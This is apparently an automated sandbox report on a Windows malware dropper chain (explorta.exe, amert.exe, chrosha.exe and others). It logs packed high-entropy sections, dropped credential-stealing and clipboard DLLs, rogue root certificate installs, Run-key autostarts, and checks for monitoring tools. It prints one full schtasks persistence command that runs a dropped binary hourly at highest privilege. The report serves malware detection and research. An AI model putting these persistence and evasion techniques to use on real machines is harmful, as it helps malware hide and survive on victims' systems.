                                Source: clip64.dll.44.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                                Source: amert[1].exe.2.drStatic PE information: real checksum: 0x1ebfee should be: 0x1e8c52
                                Source: cred64[1].dll.44.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                                Source: alexxxxxxxx[1].exe.44.drStatic PE information: real checksum: 0x0 should be: 0x1c49ab
                                Source: explorta.exe.0.drStatic PE information: real checksum: 0x1debc8 should be: 0x1de8d3
                                Source: cred64.dll.44.drStatic PE information: real checksum: 0x0 should be: 0x14356f
                                Source: swiiiii[1].exe.44.drStatic PE information: real checksum: 0x562fb should be: 0x5eece
                                Source: clip64[1].dll.44.drStatic PE information: real checksum: 0x0 should be: 0x2272f
                                Source: swiiiii.exe.44.drStatic PE information: real checksum: 0x562fb should be: 0x5eece
                                Source: amert.exe.2.drStatic PE information: real checksum: 0x1ebfee should be: 0x1e8c52
                                Source: chrosha.exe.26.drStatic PE information: real checksum: 0x1ebfee should be: 0x1e8c52
                                Source: file.exeStatic PE information: real checksum: 0x1debc8 should be: 0x1de8d3
                                Source: file.exeStatic PE information: section name:
                                Source: file.exeStatic PE information: section name: .idata
                                Source: file.exeStatic PE information: section name:
                                Source: file.exeStatic PE information: section name: wqkjverv
                                Source: file.exeStatic PE information: section name: wmthiooa
                                Source: file.exeStatic PE information: section name: .taggant
                                Source: explorta.exe.0.drStatic PE information: section name:
                                Source: explorta.exe.0.drStatic PE information: section name: .idata
                                Source: explorta.exe.0.drStatic PE information: section name:
                                Source: explorta.exe.0.drStatic PE information: section name: wqkjverv
                                Source: explorta.exe.0.drStatic PE information: section name: wmthiooa
                                Source: explorta.exe.0.drStatic PE information: section name: .taggant
                                Source: amert[1].exe.2.drStatic PE information: section name:
                                Source: amert[1].exe.2.drStatic PE information: section name: .idata
                                Source: amert[1].exe.2.drStatic PE information: section name:
                                Source: amert[1].exe.2.drStatic PE information: section name: nkxbjlfg
                                Source: amert[1].exe.2.drStatic PE information: section name: kzjaljwy
                                Source: amert[1].exe.2.drStatic PE information: section name: .taggant
                                Source: amert.exe.2.drStatic PE information: section name:
                                Source: amert.exe.2.drStatic PE information: section name: .idata
                                Source: amert.exe.2.drStatic PE information: section name:
                                Source: amert.exe.2.drStatic PE information: section name: nkxbjlfg
                                Source: amert.exe.2.drStatic PE information: section name: kzjaljwy
                                Source: amert.exe.2.drStatic PE information: section name: .taggant
                                Source: random[1].exe0.2.drStatic PE information: section name:
                                Source: random[1].exe0.2.drStatic PE information: section name: .idata
                                Source: random[1].exe0.2.drStatic PE information: section name:
                                Source: random[1].exe0.2.drStatic PE information: section name: unpqzwpm
                                Source: random[1].exe0.2.drStatic PE information: section name: glmqmaxs
                                Source: 2531414c80.exe.2.drStatic PE information: section name:
                                Source: 2531414c80.exe.2.drStatic PE information: section name: .idata
                                Source: 2531414c80.exe.2.drStatic PE information: section name:
                                Source: 2531414c80.exe.2.drStatic PE information: section name: unpqzwpm
                                Source: 2531414c80.exe.2.drStatic PE information: section name: glmqmaxs
                                Source: sarra[1].exe.2.drStatic PE information: section name:
                                Source: sarra[1].exe.2.drStatic PE information: section name: .idata
                                Source: sarra[1].exe.2.drStatic PE information: section name:
                                Source: sarra[1].exe.2.drStatic PE information: section name: xoahvbru
                                Source: sarra[1].exe.2.drStatic PE information: section name: vfiegpwq
                                Source: RageMP131.exe.8.drStatic PE information: section name:
                                Source: RageMP131.exe.8.drStatic PE information: section name: .idata
                                Source: RageMP131.exe.8.drStatic PE information: section name:
                                Source: RageMP131.exe.8.drStatic PE information: section name: unpqzwpm
                                Source: RageMP131.exe.8.drStatic PE information: section name: glmqmaxs
                                Source: MPGPH131.exe.8.drStatic PE information: section name:
                                Source: MPGPH131.exe.8.drStatic PE information: section name: .idata
                                Source: MPGPH131.exe.8.drStatic PE information: section name:
                                Source: MPGPH131.exe.8.drStatic PE information: section name: unpqzwpm
                                Source: MPGPH131.exe.8.drStatic PE information: section name: glmqmaxs
                                Source: chrosha.exe.26.drStatic PE information: section name:
                                Source: chrosha.exe.26.drStatic PE information: section name: .idata
                                Source: chrosha.exe.26.drStatic PE information: section name:
                                Source: chrosha.exe.26.drStatic PE information: section name: nkxbjlfg
                                Source: chrosha.exe.26.drStatic PE information: section name: kzjaljwy
                                Source: chrosha.exe.26.drStatic PE information: section name: .taggant
                                Source: cred64[1].dll.44.drStatic PE information: section name: _RDATA
                                Source: cred64.dll.44.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005AD10C push ecx; ret 2_2_005AD11F
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F0A76 push ecx; ret 4_2_000F0A89
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007A3F49 push ecx; ret 8_2_007A3F5C
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D030B push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D0313 push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D0346 push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D035D push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D038A push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D03B4 push ebx; retf 8_2_050D03FB
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_050D03E2 push ebx; retf 8_2_050D03FB
                                Source: file.exeStatic PE information: section name: entropy: 7.923021973448171
                                Source: file.exeStatic PE information: section name: wqkjverv entropy: 7.95472970828884
                                Source: explorta.exe.0.drStatic PE information: section name: entropy: 7.923021973448171
                                Source: explorta.exe.0.drStatic PE information: section name: wqkjverv entropy: 7.95472970828884
                                Source: amert[1].exe.2.drStatic PE information: section name: entropy: 7.978115259211233
                                Source: amert[1].exe.2.drStatic PE information: section name: nkxbjlfg entropy: 7.954199818301463
                                Source: amert.exe.2.drStatic PE information: section name: entropy: 7.978115259211233
                                Source: amert.exe.2.drStatic PE information: section name: nkxbjlfg entropy: 7.954199818301463
                                Source: random[1].exe0.2.drStatic PE information: section name: entropy: 7.926018742616288
                                Source: random[1].exe0.2.drStatic PE information: section name: unpqzwpm entropy: 7.913649772578251
                                Source: 2531414c80.exe.2.drStatic PE information: section name: entropy: 7.926018742616288
                                Source: 2531414c80.exe.2.drStatic PE information: section name: unpqzwpm entropy: 7.913649772578251
                                Source: sarra[1].exe.2.drStatic PE information: section name: entropy: 7.926032184293041
                                Source: sarra[1].exe.2.drStatic PE information: section name: xoahvbru entropy: 7.912609290174337
                                Source: RageMP131.exe.8.drStatic PE information: section name: entropy: 7.926018742616288
                                Source: RageMP131.exe.8.drStatic PE information: section name: unpqzwpm entropy: 7.913649772578251
                                Source: MPGPH131.exe.8.drStatic PE information: section name: entropy: 7.926018742616288
                                Source: MPGPH131.exe.8.drStatic PE information: section name: unpqzwpm entropy: 7.913649772578251
                                Source: chrosha.exe.26.drStatic PE information: section name: entropy: 7.978115259211233
                                Source: chrosha.exe.26.drStatic PE information: section name: nkxbjlfg entropy: 7.954199818301463
                                Source: swiiiii[1].exe.44.drStatic PE information: section name: .text entropy: 7.992152217310619
                                Source: swiiiii.exe.44.drStatic PE information: section name: .text entropy: 7.992152217310619
                                Source: alexxxxxxxx[1].exe.44.drStatic PE information: section name: .text entropy: 7.940192854489615

                                Persistence and Installation Behavior

                                barindex
                                Installs new ROOT certificates
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exeJump to dropped file
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmpJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000149001\gold.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exeJump to dropped file
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)Jump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000208001\install.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000152001\jok.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000181001\file300un.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeFile created: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeFile created: C:\Users\user\AppData\Local\Temp\1000150001\NewB.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile created: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

                                Boot Survival

                                barindex
                                Creates multiple autostart registry keys
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exeJump to behavior
                                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonclassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClassJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Filemonclass
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exeWindow searched: window name: Regmonclass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: RegmonClass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: FilemonClass
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmpJump to behavior
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorta.jobJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT1C07.tmpJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b3168c3d9b.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2531414c80.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000EF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_000EF98E
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00161C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_00161C41
                                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
